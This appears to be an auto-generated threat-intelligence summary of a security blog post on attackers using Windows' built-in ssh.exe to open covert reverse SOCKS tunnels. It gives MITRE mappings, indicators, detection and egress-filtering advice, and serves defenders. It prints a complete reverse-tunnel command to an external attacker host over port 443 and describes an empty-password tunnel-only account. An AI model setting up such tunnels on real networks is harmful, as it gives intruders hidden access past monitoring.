Full Report
Derek Banks // Living Off the Land Binaries, Scripts, and Libraries, known as LOLBins or LOLBAS, are legitimate components of an operating system that threat actors can use to achieve […] The post "Ssh… Don't Tell Them I Am Not HTTPS: How Attackers Use SSH.exe as a Backdoor Into Your Network" appeared first on Black Hills Information Security, Inc.
Analysis Summary
# Tool/Technique: OpenSSH on Windows Server/Desktop
## Overview
Threat actors use the legitimate, built-in OpenSSH client (`ssh.exe`) that ships with modern Windows operating systems (Server and Desktop editions since Microsoft's 2018 decision to include OpenSSH) to establish encrypted reverse tunnels (SOCKS proxies) for command and control or internal pivoting, often bypassing traditional security monitoring.
## Technical Details
- Type: Attack Tool (via Living Off the Land Binary - LOLBAS)
- Platform: Windows Server, Windows Desktop OS
- Capabilities: Establishing outbound, encrypted reverse SSH tunnels for port forwarding (SOCKS Proxy), running in the background, connecting over non-standard ports (e.g., TCP 443), and leveraging tunnel-only user accounts with empty passwords.
- First Seen: The integration of OpenSSH into Windows was formalized around 2018, but the specific malicious technique described here was identified during a recent incident response engagement.
## MITRE ATT&CK Mapping
*Note: The article explicitly states this specific technique does not currently appear to be mapped in MITRE ATT&CK, particularly the combination of flags and the empty password/tunnel-only user setup.*
Based on the functionality observed:
- T1090 - Proxy
- T1090.002 - External Proxy
- T1090.003 - Multi-hop Proxy
- T1573 - Encrypted Channel
- T1573.002 - Symmetric Cryptography
- T1059 - Command and Scripting Interpreter
- T1059.003 - Windows Command Shell (for executing the initial attack command or batch file)
## Functionality
### Core Capabilities
The primary function observed is establishing a hidden, encrypted reverse tunnel to an external host:
`ssh.exe sshtunnel@external_host -f -N -R 50000:victim_host:local_port -p 443 -o StrictHostKeyChecking=no`
1. **Reverse Tunneling (`-R`):** Forwarding a port on the remote (attacker-controlled) host back to a port on the victim network, effectively creating a SOCKS proxy accessible from the external machine via the tunneled port.
2. **Background Execution (`-f`):** Running the SSH command unobtrusively in the background.
3. **Non-Interactive Port Forwarding (`-N`):** Executing only the tunneling functionality without running a remote shell.
4. **Obfuscated Port Usage (`-p 443`):** Using TCP port 443 (typically reserved for HTTPS) to blend in with common outbound traffic.
5. **Bypassing Host Key Prompts (`-o StrictHostKeyChecking=no`):** Ensures the command runs without user interaction, which is needed for automated execution from a persistence mechanism (such as a scheduled task).
### Advanced Features
* **Tunnel-Only Authentication:** A server-side configuration (`sshd_config`) on the attacker's host, combined with an empty password for a dedicated user (e.g., `sshtunnel`), that allows authentication for the purpose of establishing the tunnel but denies an interactive shell session.
* **Network Pivoting:** Once the tunnel is established, the attacker can pivot internally, for instance, using tools like Proxychains, Impacket, and Python Bloodhound against internal systems, leveraging compromised domain credentials.
## Indicators of Compromise
- File Hashes: [Not provided in the context]
- File Names: `ssh.exe` (used from expected system location or potentially hidden locations). Batch files stored in temp directories named similarly to valid Windows DLLs.
- Registry Keys: [Not provided in the context, though persistence relied on a Scheduled Task]
- Network Indicators: Outbound SSH connections from Windows hosts to the internet, on TCP 22 or a non-standard port; specifically, connections over TCP 443 that carry the SSH protocol rather than TLS.
- Behavioral Indicators:
* Execution of `ssh.exe` with flags `-f`, `-N`, and `-R`.
* Connections originating from Windows systems to external hosts on TCP 443 or other non-standard ports that utilize the SSH protocol fingerprint.
* The presence of brackets `[ ]` around hostnames or IP addresses in `known_hosts` files (recorded as `[host]:port`), indicating connections over non-standard ports.
## Associated Threat Actors
[Not explicitly named in the context, but the scenario implies a sophisticated actor capable of achieving Domain Credential compromise and setting up specific configurations on the attacker's C2 server.]
## Detection Methods
- Signature-based detection: Detecting known command-line arguments for `ssh.exe`, particularly the combination of `-f`, `-N`, and `-R`.
- Behavioral detection: Alerting on outbound network traffic using the SSH protocol stack over ports other than TCP 22, especially TCP 443.
- YARA rules: [Not provided in the context]
- Threat Hunting: Inspecting `known_hosts` files for hostnames enclosed in brackets (`[hostname]`), which signals connections to non-standard ports. Alerting on the use of the specific combination of SSH flags listed above across the environment.
## Mitigation Strategies
- Prevention measures:
* **Egress Filtering:** Implement Application Layer Firewall rules to enforce strict egress control. Configure the firewall so that only expected application traffic (e.g., HTTPS only on TCP 443) is allowed on corresponding ports.
* **Deny-by-Default:** Implement a general deny rule for all outbound TCP ports not explicitly required for business operations.
- Hardening recommendations:
* **Limit SSH Use:** If OpenSSH is not required on a system, ensure it is disabled or uninstalled.
* **Restrict Exceptions:** If legitimate SSH use is necessary (e.g., for administrators), limit exceptions strictly by user and source IP address.
* **Credential Security:** Assume domain compromise and focus on securing credentials to prevent the attacker from reaching the stage where they can set up persistence mechanisms.
## Related Tools/Techniques
- [Impacket](https://github.com/fortra/impacket) (Used post-tunneling for internal lateral movement)
- [Python Bloodhound](https://github.com/fox-it/BloodHound.py) (Used post-tunneling for internal mapping)
- Proxychains (Tool used to chain proxy connections)
- Other LOLBins leveraged for persistence (e.g., Scheduled Tasks)